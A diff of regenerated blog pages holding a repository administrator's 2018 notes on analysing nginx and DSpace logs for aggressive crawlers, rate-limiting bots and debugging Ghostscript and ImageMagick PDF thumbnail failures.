<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Nov/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1300 66.249.64.63
1384 35.237.175.180
1430 138.201.52.218
@ -152,7 +152,7 @@ Today these are the top 10 IPs:
</code></pre><ul>
<li>They at least seem to be re-using their Tomcat sessions:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=84.38.130.177' dspace.log.2018-11-03
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=84.38.130.177&#39; dspace.log.2018-11-03
342
</code></pre><ul>
<li><code>50.116.102.77</code> is also a regular REST API user</li>
@ -163,7 +163,7 @@ Today these are the top 10 IPs:
</code></pre><ul>
<li>And it doesn&rsquo;t seem they are re-using their Tomcat sessions:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=138.201.52.218' dspace.log.2018-11-03
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=138.201.52.218&#39; dspace.log.2018-11-03
1243
</code></pre><ul>
<li>Ah, we&rsquo;ve apparently seen this server exactly a year ago in 2017-11, making 40,000 requests in one day&hellip;</li>
@ -171,7 +171,7 @@ Today these are the top 10 IPs:
<li>Linode sent a mail that CGSpace (linode18) is using high outgoing bandwidth</li>
<li>Looking at the nginx logs again I see the following top ten IPs:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Nov/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Nov/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1979 50.116.102.77
1980 35.237.175.180
2186 207.46.13.156
@ -189,9 +189,9 @@ Today these are the top 10 IPs:
</code></pre><ul>
<li>It&rsquo;s making lots of requests, though actually it does seem to be re-using its Tomcat sessions:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18&#39; dspace.log.2018-11-03
8449
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18&#39; dspace.log.2018-11-03 | sort | uniq | wc -l
1
</code></pre><ul>
<li><em>Updated on 2018-12-04 to correct the grep command above, as it was inaccurate and it seems the bot was actually already re-using its Tomcat sessions</em></li>
@ -200,7 +200,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03
<li>I think it&rsquo;s reasonable for a human to click one of those links five or ten times a minute&hellip;</li>
<li>To contrast, <code>78.46.89.18</code> made about 300 requests per minute for a few hours today:</li>
</ul>
<pre tabindex="0"><code># grep 78.46.89.18 /var/log/nginx/access.log | grep -o -E '03/Nov/2018:[0-9][0-9]:[0-9][0-9]' | sort | uniq -c | sort -n | tail -n 20
<pre tabindex="0"><code># grep 78.46.89.18 /var/log/nginx/access.log | grep -o -E &#39;03/Nov/2018:[0-9][0-9]:[0-9][0-9]&#39; | sort | uniq -c | sort -n | tail -n 20
286 03/Nov/2018:18:02
287 03/Nov/2018:18:21
289 03/Nov/2018:18:23
@ -232,7 +232,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03
<li>Linode emailed about the CPU load and outgoing bandwidth on CGSpace (linode18) again</li>
<li>Here are the top ten IPs active so far this morning:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;04/Nov/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;04/Nov/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1083 2a03:2880:11ff:2::face:b00c
1105 2a03:2880:11ff:d::face:b00c
1111 2a03:2880:11ff:f::face:b00c
@ -246,15 +246,15 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03
</code></pre><ul>
<li><code>78.46.89.18</code> is back&hellip; and it is still actually re-using its Tomcat sessions:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18&#39; dspace.log.2018-11-04
8765
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18&#39; dspace.log.2018-11-04 | sort | uniq | wc -l
1
</code></pre><ul>
<li><em>Updated on 2018-12-04 to correct the grep command and point out that the bot was actually re-using its Tomcat sessions properly</em></li>
<li>Also, now we have a ton of Facebook crawlers:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;04/Nov/2018&quot; | grep &quot;2a03:2880:11ff:&quot; | awk '{print $1}' | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;04/Nov/2018&#34; | grep &#34;2a03:2880:11ff:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n
905 2a03:2880:11ff:b::face:b00c
955 2a03:2880:11ff:5::face:b00c
965 2a03:2880:11ff:e::face:b00c
@ -275,7 +275,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04
</code></pre><ul>
<li>They are really making shit tons of requests:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-04
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff&#39; dspace.log.2018-11-04
37721
</code></pre><ul>
<li><em>Updated on 2018-12-04 to correct the grep command to accurately show the number of requests</em></li>
@ -286,7 +286,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04
<li>I will add it to the Tomcat Crawler Session Manager valve</li>
<li>Later in the evening&hellip; ok, this Facebook bot is getting super annoying:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;04/Nov/2018&quot; | grep &quot;2a03:2880:11ff:&quot; | awk '{print $1}' | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;04/Nov/2018&#34; | grep &#34;2a03:2880:11ff:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n
1871 2a03:2880:11ff:3::face:b00c
1885 2a03:2880:11ff:b::face:b00c
1941 2a03:2880:11ff:8::face:b00c
@ -307,15 +307,15 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04
</code></pre><ul>
<li>Now at least the Tomcat Crawler Session Manager Valve seems to be forcing it to re-use some Tomcat sessions:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-04
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff&#39; dspace.log.2018-11-04
37721
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-04 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff&#39; dspace.log.2018-11-04 | sort | uniq | wc -l
15206
</code></pre><ul>
<li>I think we still need to limit more of the dynamic pages, like the &ldquo;most popular&rdquo; country, item, and author pages</li>
<li>It seems these are popular too, and there is no fucking way Facebook needs that information, yet they are requesting thousands of them!</li>
</ul>
<pre tabindex="0"><code># grep 'face:b00c' /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -c 'most-popular/'
<pre tabindex="0"><code># grep &#39;face:b00c&#39; /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -c &#39;most-popular/&#39;
7033
</code></pre><ul>
<li>I added the &ldquo;most-popular&rdquo; pages to the list that return <code>X-Robots-Tag: none</code> to try to inform bots not to index or follow those pages</li>
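<li>A quick way to verify the header (a sketch; the handle and &ldquo;most popular&rdquo; path here are illustrative, not a specific item):</li>
</ul>
<pre tabindex="0"><code>$ http --print h &#39;https://dspacetest.cgiar.org/handle/10568/1/most-popular/country&#39; | grep -i x-robots-tag
</code></pre>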
@ -325,20 +325,20 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11
<ul>
<li>I wrote a small Python script <a href="https://gist.github.com/alanorth/4ff81d5f65613814a66cb6f84fdf1fc5">add-dc-rights.py</a> to add usage rights (<code>dc.rights</code>) to CGSpace items based on the CSV Hector gave me from MARLO:</li>
</ul>
<pre tabindex="0"><code>$ ./add-dc-rights.py -i /tmp/marlo.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-dc-rights.py -i /tmp/marlo.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>The file <code>marlo.csv</code> was cleaned up and formatted in Open Refine</li>
<li>165 of the items in their 2017 data are from CGSpace!</li>
<li>I will add the data to CGSpace this week (done!)</li>
<li>Jesus, is Facebook <em>trying</em> to be annoying? At least the Tomcat Crawler Session Manager Valve is working to force the bot to re-use its Tomcat sessions:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;05/Nov/2018&quot; | grep -c &quot;2a03:2880:11ff:&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;05/Nov/2018&#34; | grep -c &#34;2a03:2880:11ff:&#34;
29889
# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-05
# grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff&#39; dspace.log.2018-11-05
29763
# grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-05 | sort | uniq | wc -l
# grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff&#39; dspace.log.2018-11-05 | sort | uniq | wc -l
1057
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;05/Nov/2018&quot; | grep &quot;2a03:2880:11ff:&quot; | grep -c -E &quot;(handle|bitstream)&quot;
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;05/Nov/2018&#34; | grep &#34;2a03:2880:11ff:&#34; | grep -c -E &#34;(handle|bitstream)&#34;
29896
</code></pre><ul>
<li>29,000 requests from Facebook and none of the requests are to the dynamic pages I rate limited yesterday!</li>
@ -403,8 +403,8 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11
<ul>
<li>Testing corrections and deletions for AGROVOC (<code>dc.subject</code>) that Sisay and Peter were working on earlier this month:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-11-19-correct-agrovoc.csv -f dc.subject -t correct -m 57 -db dspace -u dspace -p 'fuu' -d
$ ./delete-metadata-values.py -i 2018-11-19-delete-agrovoc.csv -f dc.subject -m 57 -db dspace -u dspace -p 'fuu' -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-11-19-correct-agrovoc.csv -f dc.subject -t correct -m 57 -db dspace -u dspace -p &#39;fuu&#39; -d
$ ./delete-metadata-values.py -i 2018-11-19-delete-agrovoc.csv -f dc.subject -m 57 -db dspace -u dspace -p &#39;fuu&#39; -d
</code></pre><ul>
<li>Then I ran them on both CGSpace and DSpace Test, and started a full Discovery re-index on CGSpace:</li>
</ul>
@ -497,7 +497,7 @@ $ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
<li>Linode alerted me that the outbound traffic rate on CGSpace (linode19) was very high</li>
<li>The top users this morning are:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;27/Nov/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;27/Nov/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
229 46.101.86.248
261 66.249.64.61
447 66.249.64.59

View File

@ -36,7 +36,7 @@ Then I ran all system updates and restarted the server
I noticed that there is another issue with PDF thumbnails on CGSpace, and I see there was another Ghostscript vulnerability last week
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -135,8 +135,8 @@ I noticed that there is another issue with PDF thumbnails on CGSpace, and I see
<ul>
<li>The error when I try to manually run the media filter for one item from the command line:</li>
</ul>
<pre tabindex="0"><code>org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pngalpha&quot; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &quot;-r72x72&quot; -dFirstPage=1 -dLastPage=1 &quot;-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d&quot; &quot;-f/tmp/magick-129895Bmp44lvUfxo&quot; &quot;-f/tmp/magick-12989C0QFG51fktLF&quot;' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pngalpha&quot; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &quot;-r72x72&quot; -dFirstPage=1 -dLastPage=1 &quot;-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d&quot; &quot;-f/tmp/magick-129895Bmp44lvUfxo&quot; &quot;-f/tmp/magick-12989C0QFG51fktLF&quot;' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
<pre tabindex="0"><code>org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d&#34; &#34;-f/tmp/magick-129895Bmp44lvUfxo&#34; &#34;-f/tmp/magick-12989C0QFG51fktLF&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d&#34; &#34;-f/tmp/magick-129895Bmp44lvUfxo&#34; &#34;-f/tmp/magick-12989C0QFG51fktLF&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
at org.im4java.core.Info.getBaseInfo(Info.java:360)
at org.im4java.core.Info.&lt;init&gt;(Info.java:151)
at org.dspace.app.mediafilter.ImageMagickThumbnailFilter.getImageFile(ImageMagickThumbnailFilter.java:142)
@ -158,13 +158,13 @@ org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.c
<li>For what it&rsquo;s worth, I get the same error on my local Arch Linux environment with Ghostscript 9.26:</li>
</ul>
<pre tabindex="0"><code>$ gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 -sDEVICE=pngalpha -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -r72x72 -dFirstPage=1 -dLastPage=1 -sOutputFile=/tmp/out%d -f/home/aorth/Desktop/Food\ safety\ Kenya\ fruits.pdf
DEBUG: FC_WEIGHT didn't match
DEBUG: FC_WEIGHT didn&#39;t match
zsh: segmentation fault (core dumped) gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
</code></pre><ul>
<li>When I replace the <code>pngalpha</code> device with <code>png16m</code> as suggested in the StackOverflow comments it works:</li>
</ul>
<pre tabindex="0"><code>$ gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 -sDEVICE=png16m -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -r72x72 -dFirstPage=1 -dLastPage=1 -sOutputFile=/tmp/out%d -f/home/aorth/Desktop/Food\ safety\ Kenya\ fruits.pdf
DEBUG: FC_WEIGHT didn't match
DEBUG: FC_WEIGHT didn&#39;t match
</code></pre><ul>
<li>Start proofing the latest round of 226 IITA archive records that Bosede sent last week and Sisay uploaded to DSpace Test this weekend (<a href="https://dspacetest.cgiar.org/handle/10568/108298">IITA_Dec_1_1997 aka Daniel1807</a>)
<ul>
@ -203,7 +203,7 @@ DEBUG: FC_WEIGHT didn't match
</ul>
<pre tabindex="0"><code>$ identify Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf\[0\]
Info Note Mainstreaming gender and social differentiation into CCAFS research activities in West Africa-converted.pdf[0]=&gt;Info Note Mainstreaming gender and social differentiation into CCAFS research activities in West Africa-converted.pdf PDF 595x841 595x841+0+0 16-bit sRGB 107443B 0.000u 0:00.000
identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/1746.
identify: CorruptImageProfile `xmp&#39; @ warning/profile.c/SetImageProfileInternal/1746.
</code></pre><ul>
<li>And wow, I can&rsquo;t even run ImageMagick&rsquo;s <code>identify</code> on the first page of the second item (10568/98930):</li>
</ul>
@ -213,7 +213,7 @@ zsh: abort (core dumped) identify Food\ safety\ Kenya\ fruits.pdf\[0\]
<li>But with GraphicsMagick&rsquo;s <code>identify</code> it works:</li>
</ul>
<pre tabindex="0"><code>$ gm identify Food\ safety\ Kenya\ fruits.pdf\[0\]
DEBUG: FC_WEIGHT didn't match
DEBUG: FC_WEIGHT didn&#39;t match
Food safety Kenya fruits.pdf PDF 612x792+0+0 DirectClass 8-bit 1.4Mi 0.000u 0m:0.000002s
</code></pre><ul>
<li>Interesting that ImageMagick&rsquo;s <code>identify</code> <em>does</em> work if you do not specify a page, perhaps as <a href="https://bugs.ghostscript.com/show_bug.cgi?id=699815">alluded to in the recent Ghostscript bug report</a>:</li>
@ -224,20 +224,20 @@ Food safety Kenya fruits.pdf[1] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010
Food safety Kenya fruits.pdf[2] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
Food safety Kenya fruits.pdf[3] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
Food safety Kenya fruits.pdf[4] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/1746.
identify: CorruptImageProfile `xmp&#39; @ warning/profile.c/SetImageProfileInternal/1746.
</code></pre><ul>
<li>As I expected, ImageMagick cannot generate a thumbnail, but GraphicsMagick can (though it looks like crap):</li>
</ul>
<pre tabindex="0"><code>$ convert Food\ safety\ Kenya\ fruits.pdf\[0\] -thumbnail 600x600 -flatten Food\ safety\ Kenya\ fruits.pdf.jpg
zsh: abort (core dumped) convert Food\ safety\ Kenya\ fruits.pdf\[0\] -thumbnail 600x600 -flatten
$ gm convert Food\ safety\ Kenya\ fruits.pdf\[0\] -thumbnail 600x600 -flatten Food\ safety\ Kenya\ fruits.pdf.jpg
DEBUG: FC_WEIGHT didn't match
DEBUG: FC_WEIGHT didn&#39;t match
</code></pre><ul>
<li>I inspected the troublesome PDF using <a href="http://jhove.openpreservation.org/">jhove</a> and noticed that it is using <code>ISO PDF/A-1, Level B</code> and the other one doesn&rsquo;t list a profile, though I don&rsquo;t think this is relevant</li>
<li>I found another item that fails when generating a thumbnail (<a href="https://hdl.handle.net/10568/98391">10568/98391</a>); DSpace complains:</li>
</ul>
<pre tabindex="0"><code>org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pngalpha&quot; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &quot;-r72x72&quot; -dFirstPage=1 -dLastPage=1 &quot;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&quot; &quot;-f/tmp/magick-14296Q0rJjfCeIj3w&quot; &quot;-f/tmp/magick-14296k_K6MWqwvpDm&quot;' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pngalpha&quot; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &quot;-r72x72&quot; -dFirstPage=1 -dLastPage=1 &quot;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&quot; &quot;-f/tmp/magick-14296Q0rJjfCeIj3w&quot; &quot;-f/tmp/magick-14296k_K6MWqwvpDm&quot;' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
<pre tabindex="0"><code>org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&#34; &#34;-f/tmp/magick-14296Q0rJjfCeIj3w&#34; &#34;-f/tmp/magick-14296k_K6MWqwvpDm&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&#34; &#34;-f/tmp/magick-14296Q0rJjfCeIj3w&#34; &#34;-f/tmp/magick-14296k_K6MWqwvpDm&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
at org.im4java.core.Info.getBaseInfo(Info.java:360)
at org.im4java.core.Info.&lt;init&gt;(Info.java:151)
at org.dspace.app.mediafilter.ImageMagickThumbnailFilter.getImageFile(ImageMagickThumbnailFilter.java:142)
@ -253,11 +253,11 @@ org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.c
at java.lang.reflect.Method.invoke(Method.java:498)
at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
Caused by: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pngalpha&quot; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &quot;-r72x72&quot; -dFirstPage=1 -dLastPage=1 &quot;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&quot; &quot;-f/tmp/magick-14296Q0rJjfCeIj3w&quot; &quot;-f/tmp/magick-14296k_K6MWqwvpDm&quot;' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
Caused by: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&#34; &#34;-f/tmp/magick-14296Q0rJjfCeIj3w&#34; &#34;-f/tmp/magick-14296k_K6MWqwvpDm&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
at org.im4java.core.ImageCommand.run(ImageCommand.java:219)
at org.im4java.core.Info.getBaseInfo(Info.java:342)
... 14 more
Caused by: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pngalpha&quot; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &quot;-r72x72&quot; -dFirstPage=1 -dLastPage=1 &quot;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&quot; &quot;-f/tmp/magick-14296Q0rJjfCeIj3w&quot; &quot;-f/tmp/magick-14296k_K6MWqwvpDm&quot;' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
Caused by: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&#34; &#34;-f/tmp/magick-14296Q0rJjfCeIj3w&#34; &#34;-f/tmp/magick-14296k_K6MWqwvpDm&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
at org.im4java.core.ImageCommand.finished(ImageCommand.java:253)
at org.im4java.process.ProcessStarter.run(ProcessStarter.java:314)
at org.im4java.core.ImageCommand.run(ImageCommand.java:215)
@ -274,22 +274,22 @@ zsh: abort (core dumped) convert bnfb_biofortification\ Module_Participants\ Gu
</code></pre><ul>
<li>So far the only thing that stands out is that the two files that don&rsquo;t work were created with Microsoft Office 2016:</li>
</ul>
<pre tabindex="0"><code>$ pdfinfo bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf | grep -E '^(Creator|Producer)'
<pre tabindex="0"><code>$ pdfinfo bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf | grep -E &#39;^(Creator|Producer)&#39;
Creator: Microsoft® Word 2016
Producer: Microsoft® Word 2016
$ pdfinfo Food\ safety\ Kenya\ fruits.pdf | grep -E '^(Creator|Producer)'
$ pdfinfo Food\ safety\ Kenya\ fruits.pdf | grep -E &#39;^(Creator|Producer)&#39;
Creator: Microsoft® Word 2016
Producer: Microsoft® Word 2016
</code></pre><ul>
<li>And the one that works was created with Office 365:</li>
</ul>
<pre tabindex="0"><code>$ pdfinfo Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf | grep -E '^(Creator|Producer)'
<pre tabindex="0"><code>$ pdfinfo Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf | grep -E &#39;^(Creator|Producer)&#39;
Creator: Microsoft® Word for Office 365
Producer: Microsoft® Word for Office 365
</code></pre><ul>
